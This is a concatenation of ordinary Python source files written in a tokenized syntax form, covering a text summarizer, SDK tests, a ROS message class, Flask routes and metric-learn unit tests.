criteria.items()<block_start>val=fn(batch)<if_stmt>val<g>top_values[crit]<block_start>top_values[crit]=val<line_sep>top_batches[crit]=batch<block_end><block_end><block_end><return>top_batches top_values<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division print_function unicode_literals<import_from_stmt>sumy.parsers.html HtmlParser<import_from_stmt>sumy.parsers.plaintext PlaintextParser<import_from_stmt>sumy.nlp.tokenizers Tokenizer<line_sep>#from sumy.summarizers.lsa import LsaSummarizer as Summarizer <import_from_stmt>sumy.summarizers.lex_rank LexRankSummarizer<as>Summarizer<import_from_stmt>sumy.nlp.stemmers Stemmer<import_from_stmt>sumy.utils get_stop_words<class_stmt>TextSummarizer<block_start><def_stmt>__init__ self count=10<block_start>self.LANGUAGE="czech"<line_sep>self.SENTENCES_COUNT=count<block_end><def_stmt>summarize_from_url self url<block_start>parser=HtmlParser.from_url(url Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><def_stmt>summarize_from_text self text<block_start>parser=PlaintextParser.from_string(text Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><def_stmt>summarize_from_file self file_name<block_start>parser=PlaintextParser.from_file(file_name Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><block_end># t = TextSummarizer() # t.summarize_from_file("obama_short.txt") # pdf = pdfgeneration() # pdf.generate_pdf_summarizer("summarizer_output2.txt")
<import_stmt>responses<import_from_stmt>tests.util random_str<import_from_stmt>tests.util mock_http_response<import_from_stmt>binance.spot Spot<as>Client<import_from_stmt>binance.lib.utils encoded_string<import_from_stmt>binance.error ParameterRequiredError<line_sep>mock_item={"key_1":"value_1" "key_2":"value_2"}<line_sep>key=random_str()<line_sep>secret=random_str()<line_sep>params={"email":"<EMAIL>" "coin":"BNB" "network":"BNB" "recvWindow":1000 }<def_stmt>test_sub_account_deposit_address_without_email <block_start>"""Tests the API endpoint to get deposit address without email"""<line_sep>params={"email":"" "coin":"BNB" "network":"BNB" "recvWindow":1000}<line_sep>client=Client(key secret)<line_sep>client.sub_account_deposit_address.when.called_with(**params).should.throw(ParameterRequiredError)<block_end><def_stmt>test_sub_account_deposit_address_without_coin <block_start>"""Tests the API endpoint to get deposit address without coin"""<line_sep>params={"email":"<EMAIL>" "coin":"" "network":"BNB" "recvWindow":1000 }<line_sep>client=Client(key secret)<line_sep>client.sub_account_deposit_address.when.called_with(**params).should.throw(ParameterRequiredError)<block_end>@mock_http_response(responses.GET "/sapi/v1/capital/deposit/subAddress\\?"+encoded_string(params) mock_item 200 )<def_stmt>test_sub_account_deposit_address <block_start>"""Tests the API endpoint to get deposit address"""<line_sep>client=Client(key secret)<line_sep>response=client.sub_account_deposit_address(**params)<line_sep>response.should.equal(mock_item)<block_end>
<import_from_stmt>vue.bridge Object<import_stmt>javascript<class_stmt>VueDecorator<block_start>__key__=<none><line_sep>__parents__=()<line_sep>__id__=<none><line_sep>__value__=<none><def_stmt>update self vue_dict<block_start>base=vue_dict<for_stmt>parent self.__parents__<block_start>base=vue_dict.setdefault(parent {})<block_end><if_stmt>self.__id__<is><none><block_start>base[self.__key__]=self.__value__<block_end><else_stmt><block_start>base=base.setdefault(self.__key__ {})<line_sep>value=self.__value__<if_stmt>isinstance(base.get(self.__id__) dict)<block_start>base[self.__id__].update(value)<block_end><else_stmt><block_start>base[self.__id__]=value<block_end><block_end><block_end><block_end><def_stmt>pyjs_bridge fn inject_vue_instance=<false><block_start><def_stmt>wrapper *args **kwargs<block_start>args=(javascript.this() *args)<if>inject_vue_instance<else>args<line_sep>args=tuple(Object.from_js(arg)<for>arg args)<line_sep>kwargs={k:Object.from_js(v)<for>k,v kwargs.items()}<line_sep><return>Object.to_js(fn(*args **kwargs))<block_end>wrapper.__name__=fn.__name__<line_sep><return>wrapper<block_end>
<import_from_stmt>setuptools setup find_packages<line_sep>__name__="appJar"<line_sep>__version__="0.94.0"<line_sep>__author__="<NAME>"<line_sep>__desc__="An easy-to-use, feature-rich GUI wrapper for tKinter. Designed specifically for use in the classroom, but powerful enough to be used anywhere."<line_sep>__author_email__="<EMAIL>"<line_sep>__license__="Apache 2.0"<line_sep>__url__="http://appJar.info"<line_sep>__keywords__=["python" "gui" "tkinter" "appJar" "interface"]<line_sep>__packages__=["appJar"]<line_sep>__classifiers__=['Development Status :: 4 - Beta' 'Intended Audience :: Developers' 'Intended Audience :: Education' 'Programming Language :: Python :: 2' 'Programming Language :: Python :: 2.7' 'Programming Language :: Python :: 3.3' 'Programming Language :: Python :: 3' 'Programming Language :: Python :: 3.4' 'Programming Language :: Python :: 3.5' 'Programming Language :: Python :: 3.6' 'Topic :: Education' 'Topic :: Software Development' 'Topic :: Software Development :: User Interfaces' 'Topic :: Software Development :: Libraries :: Python Modules' 'License :: OSI Approved :: Apache Software License' ]<line_sep>__long_description__="""# appJar Simple tKinter GUIs in Python. """<line_sep>setup(name=__name__ packages=__packages__ version=__version__ description=__desc__ long_description=__long_description__ long_description_content_type="text/markdown" author=__author__ author_email=__author_email__ url=__url__ keywords=__keywords__ license=__license__ classifiers=__classifiers__ package_data={"appJar":["lib/*.py" "lib/*.txt" "lib/tkdnd2.8/*.tcl" "lib/tkdnd2.8/tcl_files/*.tcl" "lib/tkdnd2.8/tcl_libs/*" "resources/icons/*" "examples/showcase.py" "PYPI.md"]})<line_sep>
# # This file is part of the LibreOffice project. # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # # This file incorporates work covered by the following license notice: # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed # with this work for additional information regarding copyright # ownership. The ASF licenses this file to you under the Apache # License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. You may obtain a copy of # the License at http://www.apache.org/licenses/LICENSE-2.0 . # <import_from_stmt>.CommonListener ItemListenerProcAdapter<import_from_stmt>.DataAware DataAware<class_stmt>RadioDataAware(DataAware)<block_start><def_stmt>__init__ self data value radioButtons<block_start>super(RadioDataAware self).__init__(data value)<line_sep>self.radioButtons=radioButtons<block_end><def_stmt>setToUI self value<block_start>selected=int(value)<if_stmt>selected<eq>-1<block_start><for_stmt>i self.radioButtons<block_start>i.State=<false><block_end><block_end><else_stmt><block_start>self.radioButtons[selected].State=<true><block_end><block_end><def_stmt>getFromUI self<block_start><for_stmt>index,workwith enumerate(self.radioButtons)<block_start><if_stmt>workwith.State<block_start><return>index<block_end><block_end><return>-1<block_end>@classmethod<def_stmt>attachRadioButtons self data prop buttons field<block_start>da=RadioDataAware(data prop buttons)<line_sep>method=getattr(da "updateData")<for_stmt>i da.radioButtons<block_start>i.addItemListener(ItemListenerProcAdapter(method))<block_end><return>da<block_end><block_end>
""" Runs tests for Ptyhon Odin SDK """<import_stmt>unittest<import_from_stmt>os environ<import_stmt>random<import_from_stmt>pymongo MongoClient<import_stmt>pyodin<as>odin<class_stmt>OdinSdkTest(unittest.TestCase)<block_start>""" Establish OdinSdkTest object """<def_stmt>setUp self<block_start>client=MongoClient(environ.get('ODIN_MONGODB'))<line_sep>mongodb=client['odin']<line_sep>self.collection=mongodb['observability']<block_end><def_stmt>tearDown self<block_start>self.collection.delete_many({"id":"test_id"})<block_end><def_stmt>test_condition_not_odin_env self<block_start>""" Run condition operation outside of Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep>odin_test=odin.Odin(config="job.yml" path_type="relative")<line_sep>cond=odin_test.condition(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(cond <true>)<line_sep>self.assertEqual(<none> result)<block_end><def_stmt>test_watch_not_odin_env self<block_start>""" Run watch operation outside of Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep>odin_test=odin.Odin(config="job.yml" path_type="relative")<line_sep>odin_test.watch(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(<none> result)<block_end><def_stmt>test_condition self<block_start>""" Run condition operation inside Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep># test True sets odin exc env to true and in turn enables logging everything to the DB odin_test=odin.Odin(test=<true> config="job.yml" path_type="relative")<line_sep>cond=odin_test.condition(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(cond <true>)<line_sep>self.assertEqual(test_desc result['description'])<block_end><def_stmt>test_watch self<block_start>""" Run watch operation inside Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep># test True sets odin exc env to true and in turn enables logging everything to the DB odin_test=odin.Odin(test=<true> config="job.yml" path_type="relative")<line_sep>odin_test.watch(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(test_desc result['description'])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end># run all tests
<import_from_stmt>artemis.general.dict_ops cross_dict_dicts merge_dicts<line_sep>__author__='peter'<def_stmt>test_cross_dict_dicts <block_start><assert_stmt>cross_dict_dicts({'a':{'aa':1} 'b':{'bb':2}} {'c':{'cc':3} 'd':{'dd':4}})<eq>{('a' 'c'):{'aa':1 'cc':3} ('a' 'd'):{'aa':1 'dd':4} ('b' 'c'):{'bb':2 'cc':3} ('b' 'd'):{'bb':2 'dd':4}}<block_end><def_stmt>test_dict_merge <block_start><assert_stmt>merge_dicts({'a':1 'b':2 'c':3} {'c':4 'd':5} {'d':6 'e':7})<eq>{'a':1 'b':2 'c':4 'd':6 'e':7 }<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_dict_merge()<line_sep>test_cross_dict_dicts()<block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project # root for license information. <import_from_stmt>typing List<import_from_stmt>pathlib Path<import_from_stmt>azure.storage.blob ContainerClient<import_from_stmt>redact.types.file_bundle FileBundle<class_stmt>BlobReader()<block_start><def_stmt>__init__ self container_url:str prefix:str<block_start>self.container_client=ContainerClient.from_container_url(container_url)<line_sep>self.prefix=prefix<block_end><def_stmt>download_bundles self to:str<arrow>List[FileBundle]<block_start>blobs=self.container_client.list_blobs(name_starts_with=self.prefix)<line_sep>all_file_name_list=[Path(blob.name).name<for>blob blobs]<line_sep>file_bundles=FileBundle.from_names(all_file_name_list)<for_stmt>bundle file_bundles<block_start>image_blob_path=self.prefix+bundle.image_file_name<line_sep>fott_blob_path=self.prefix+bundle.fott_file_name<line_sep>ocr_blob_path=self.prefix+bundle.ocr_file_name<line_sep>image_path=Path(to bundle.image_file_name)<line_sep>fott_path=Path(to bundle.fott_file_name)<line_sep>ocr_path=Path(to bundle.ocr_file_name)<with_stmt>open(image_path 'wb')<as>image_file open(fott_path 'wb')<as>fott_file open(ocr_path 'wb')<as>ocr_file<block_start>image_file.write(self.container_client.download_blob(image_blob_path).readall())<line_sep>fott_file.write(self.container_client.download_blob(fott_blob_path).readall())<line_sep>ocr_file.write(self.container_client.download_blob(ocr_blob_path).readall())<block_end><block_end><return>file_bundles<block_end><block_end>
"""autogenerated by genpy from multi_map_server/VerticalOccupancyGridList.msg. Do not edit."""<import_stmt>sys<line_sep>python3=<true><if>sys.hexversion<g>0x03000000<else><false><import_stmt>genpy<import_stmt>struct<class_stmt>VerticalOccupancyGridList(genpy.Message)<block_start>_md5sum="7ef85cc95b82747f51eb01a16bd7c795"<line_sep>_type="multi_map_server/VerticalOccupancyGridList"<line_sep>_has_header=<false>#flag to mark the presence of a Header object _full_text="""float32 x float32 y int32[] upper int32[] lower int32[] mass """<line_sep>__slots__=['x' 'y' 'upper' 'lower' 'mass']<line_sep>_slot_types=['float32' 'float32' 'int32[]' 'int32[]' 'int32[]']<def_stmt>__init__ self *args **kwds<block_start>""" Constructor. Any message fields that are implicitly/explicitly set to None will be assigned a default value. The recommend use is keyword arguments as this is more robust to future message changes. You cannot mix in-order arguments and keyword arguments. The available fields are: x,y,upper,lower,mass :param args: complete set of field values, in .msg order :param kwds: use keyword arguments corresponding to message field names to set specific fields. """<if_stmt>args<or>kwds<block_start>super(VerticalOccupancyGridList self).__init__(*args **kwds)<line_sep>#message fields cannot be None, assign default values for those that are <if_stmt>self.x<is><none><block_start>self.x=0.<block_end><if_stmt>self.y<is><none><block_start>self.y=0.<block_end><if_stmt>self.upper<is><none><block_start>self.upper=[]<block_end><if_stmt>self.lower<is><none><block_start>self.lower=[]<block_end><if_stmt>self.mass<is><none><block_start>self.mass=[]<block_end><block_end><else_stmt><block_start>self.x=0.<line_sep>self.y=0.<line_sep>self.upper=[]<line_sep>self.lower=[]<line_sep>self.mass=[]<block_end><block_end><def_stmt>_get_types self<block_start>""" internal API method """<line_sep><return>self._slot_types<block_end><def_stmt>serialize self buff<block_start>""" serialize message into buffer :param buff: buffer, ``StringIO`` """<try_stmt><block_start>_x=self<line_sep>buff.write(_struct_2f.pack(_x.x _x.y))<line_sep>length=len(self.upper)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.upper))<line_sep>length=len(self.lower)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.lower))<line_sep>length=len(self.mass)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.mass))<block_end><except_stmt>struct.error<as>se<block_start>self._check_types(struct.error("%s: '%s' when writing '%s'"%(type(se) str(se) str(_x))))<block_end><except_stmt>TypeError<as>te<block_start>self._check_types(ValueError("%s: '%s' when writing '%s'"%(type(te) str(te) str(_x))))<block_end><block_end><def_stmt>deserialize self str<block_start>""" unpack serialized message in str into this message instance :param str: byte array of serialized message, ``str`` """<try_stmt><block_start>end=0<line_sep>_x=self<line_sep>start=end<line_sep>end<augadd>8<line_sep>(_x.x _x.y )=_struct_2f.unpack(str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.upper=struct.unpack(pattern str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.lower=struct.unpack(pattern str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.mass=struct.unpack(pattern str[start:end])<line_sep><return>self<block_end><except_stmt>struct.error<as>e<block_start><raise>genpy.DeserializationError(e)<block_end><block_end>#most likely buffer underfill <def_stmt>serialize_numpy self buff numpy<block_start>""" serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """<try_stmt><block_start>_x=self<line_sep>buff.write(_struct_2f.pack(_x.x _x.y))<line_sep>length=len(self.upper)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.upper.tostring())<line_sep>length=len(self.lower)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.lower.tostring())<line_sep>length=len(self.mass)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.mass.tostring())<block_end><except_stmt>struct.error<as>se<block_start>self._check_types(struct.error("%s: '%s' when writing '%s'"%(type(se) str(se) str(_x))))<block_end><except_stmt>TypeError<as>te<block_start>self._check_types(ValueError("%s: '%s' when writing '%s'"%(type(te) str(te) str(_x))))<block_end><block_end><def_stmt>deserialize_numpy self str numpy<block_start>""" unpack serialized message in str into this message instance using numpy for array types :param str: byte array of serialized message, ``str`` :param numpy: numpy python module """<try_stmt><block_start>end=0<line_sep>_x=self<line_sep>start=end<line_sep>end<augadd>8<line_sep>(_x.x _x.y )=_struct_2f.unpack(str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.upper=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.lower=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.mass=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep><return>self<block_end><except_stmt>struct.error<as>e<block_start><raise>genpy.DeserializationError(e)<block_end><block_end><block_end>#most likely buffer underfill _struct_I=genpy.struct_I<line_sep>_struct_2f=struct.Struct("<2f")<line_sep>
<import_from_stmt>nameko.timer timer<class_stmt>Service<block_start>name="service"<line_sep>@timer(interval=1)<def_stmt>ping self# method executed every second <block_start>print("pong")<block_end><block_end>
<import_from_stmt>.. bp<import_from_stmt>flask request render_template flash redirect url_for<import_from_stmt>flask_login current_user login_required<import_from_stmt>app.lib.base.provider Provider<import_from_stmt>app.lib.base.decorators admin_required<line_sep>@bp.route('/slack' methods=['GET'])@login_required@admin_required<def_stmt>slack <block_start><return>render_template('config/system/slack.html')<block_end>@bp.route('/slack/save' methods=['POST'])@login_required@admin_required<def_stmt>slack_save <block_start>provider=Provider()<line_sep>settings=provider.settings()<line_sep>slack_enabled=<true><if>int(request.form.get('slack_enabled' 0))<eq>1<else><false><line_sep>settings.save('slack_enabled' slack_enabled)<line_sep>flash('Settings saved' 'success')<line_sep><return>redirect(url_for('config.slack'))<block_end>
<import_stmt>pytest<import_stmt>re<import_stmt>unittest<import_stmt>metric_learn<import_stmt>numpy<as>np<import_from_stmt>sklearn clone<import_from_stmt>test.test_utils ids_metric_learners metric_learners remove_y<import_from_stmt>metric_learn.sklearn_shims set_random_state SKLEARN_AT_LEAST_0_22<def_stmt>remove_spaces s<block_start><return>re.sub(r'\s+' '' s)<block_end><def_stmt>sk_repr_kwargs def_kwargs nndef_kwargs<block_start>"""Given the non-default arguments, and the default keywords arguments, build the string that will appear in the __repr__ of the estimator, depending on the version of scikit-learn. """<if_stmt>SKLEARN_AT_LEAST_0_22<block_start>def_kwargs={}<block_end>def_kwargs.update(nndef_kwargs)<line_sep>args_str=",".join(f"{key}={repr(value)}"<for>key,value def_kwargs.items())<line_sep><return>args_str<block_end><class_stmt>TestStringRepr(unittest.TestCase)<block_start><def_stmt>test_covariance self<block_start>def_kwargs={'preprocessor':<none>}<line_sep>nndef_kwargs={}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.Covariance())) remove_spaces(f"Covariance({merged_kwargs})"))<block_end><def_stmt>test_lmnn self<block_start>def_kwargs={'convergence_tol':0.001 'init':'auto' 'k':3 'learn_rate':1e-07 'max_iter':1000 'min_iter':50 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'regularization':0.5 'verbose':<false>}<line_sep>nndef_kwargs={'convergence_tol':0.01 'k':6}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LMNN(convergence_tol=0.01 k=6))) remove_spaces(f"LMNN({merged_kwargs})"))<block_end><def_stmt>test_nca self<block_start>def_kwargs={'init':'auto' 'max_iter':100 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'tol':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':42}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.NCA(max_iter=42))) remove_spaces(f"NCA({merged_kwargs})"))<block_end><def_stmt>test_lfda self<block_start>def_kwargs={'embedding_type':'weighted' 'k':<none> 'n_components':<none> 'preprocessor':<none>}<line_sep>nndef_kwargs={'k':2}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LFDA(k=2))) remove_spaces(f"LFDA({merged_kwargs})"))<block_end><def_stmt>test_itml self<block_start>def_kwargs={'convergence_threshold':0.001 'gamma':1.0 'max_iter':1000 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'gamma':0.5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.ITML(gamma=0.5))) remove_spaces(f"ITML({merged_kwargs})"))<line_sep>def_kwargs={'convergence_threshold':0.001 'gamma':1.0 'max_iter':1000 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'num_constraints':7}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.ITML_Supervised(num_constraints=7))) remove_spaces(f"ITML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_lsml self<block_start>def_kwargs={'max_iter':1000 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'tol':0.001 'verbose':<false>}<line_sep>nndef_kwargs={'tol':0.1}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LSML(tol=0.1))) remove_spaces(f"LSML({merged_kwargs})"))<line_sep>def_kwargs={'max_iter':1000 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'tol':0.001 'verbose':<false> 'weights':<none>}<line_sep>nndef_kwargs={'verbose':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LSML_Supervised(verbose=<true>))) remove_spaces(f"LSML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_sdml self<block_start>def_kwargs={'balance_param':0.5 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'sparsity_param':0.01 'verbose':<false>}<line_sep>nndef_kwargs={'verbose':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.SDML(verbose=<true>))) remove_spaces(f"SDML({merged_kwargs})"))<line_sep>def_kwargs={'balance_param':0.5 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'sparsity_param':0.01 'verbose':<false>}<line_sep>nndef_kwargs={'sparsity_param':0.5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.SDML_Supervised(sparsity_param=0.5))) remove_spaces(f"SDML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_rca self<block_start>def_kwargs={'n_components':<none> 'preprocessor':<none>}<line_sep>nndef_kwargs={'n_components':3}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.RCA(n_components=3))) remove_spaces(f"RCA({merged_kwargs})"))<line_sep>def_kwargs={'chunk_size':2 'n_components':<none> 'num_chunks':100 'preprocessor':<none> 'random_state':<none>}<line_sep>nndef_kwargs={'num_chunks':5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.RCA_Supervised(num_chunks=5))) remove_spaces(f"RCA_Supervised({merged_kwargs})"))<block_end><def_stmt>test_mlkr self<block_start>def_kwargs={'init':'auto' 'max_iter':1000 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'tol':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':777}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MLKR(max_iter=777))) remove_spaces(f"MLKR({merged_kwargs})"))<block_end><def_stmt>test_mmc self<block_start>def_kwargs={'convergence_threshold':0.001 'diagonal':<false> 'diagonal_c':1.0 'init':'identity' 'max_iter':100 'max_proj':10000 'preprocessor':<none> 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'diagonal':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MMC(diagonal=<true>))) remove_spaces(f"MMC({merged_kwargs})"))<line_sep>def_kwargs={'convergence_threshold':1e-06 'diagonal':<false> 'diagonal_c':1.0 'init':'identity' 'max_iter':100 'max_proj':10000 'num_constraints':<none> 'preprocessor':<none> 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':1}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MMC_Supervised(max_iter=1))) remove_spaces(f"MMC_Supervised({merged_kwargs})"))<block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_get_metric_is_independent_from_metric_learner estimator build_dataset<block_start>"""Tests that the get_metric method returns a function that is independent from the original metric learner"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep># we fit the metric learner on it and then we compute the metric on some # points model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>score=metric(X[0] X[1])<line_sep># then we refit the estimator on another dataset model.fit(*remove_y(model np.sin(input_data) labels))<line_sep># we recompute the distance between the two points: it should be the same score_bis=metric(X[0] X[1])<assert_stmt>score_bis<eq>score<block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_get_metric_raises_error estimator build_dataset<block_start>"""Tests that the metric returned by get_metric raises errors similar to the distance functions in scipy.spatial.distance"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>list_test_get_metric_raises=[(X[0].tolist()+[5.2] X[1]) # vectors with # different dimensions (X[0:4] X[1:5]) # 2D vectors (X[0].tolist()+[5.2] X[1]+[7.2])]<line_sep># vectors of same dimension but incompatible with what the metric learner # was trained on <for_stmt>u,v list_test_get_metric_raises<block_start><with_stmt>pytest.raises(ValueError)<block_start>metric(u v)<block_end><block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_get_metric_works_does_not_raise estimator build_dataset<block_start>"""Tests that the metric returned by get_metric does not raise errors (or warnings) similarly to the distance functions in scipy.spatial.distance"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>list_test_get_metric_doesnt_raise=[(X[0] X[1]) (X[0].tolist() X[1].tolist()) (X[0][<none>] X[1][<none>])]<for_stmt>u,v list_test_get_metric_doesnt_raise<block_start><with_stmt>pytest.warns(<none>)<as>record<block_start>metric(u v)<block_end><assert_stmt>len(record)<eq>0<block_end># Test that the scalar case works model.components_=np.array([3.1])<line_sep>metric=model.get_metric()<for_stmt>u,v [(5 6.7) ([5] [6.7]) ([[5]] [[6.7]])]<block_start><with_stmt>pytest.warns(<none>)<as>record<block_start>metric(u v)<block_end><assert_stmt>len(record)<eq>0<block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_n_components estimator build_dataset<block_start>"""Check that estimators that have a n_components parameters can use it and that it actually works as expected"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<if_stmt>hasattr(model 'n_components')<block_start>set_random_state(model)<line_sep>model.set_params(n_components=<none>)<line_sep>model.fit(*remove_y(model input_data labels))<assert_stmt>model.components_.shape<eq>(X.shape[1] 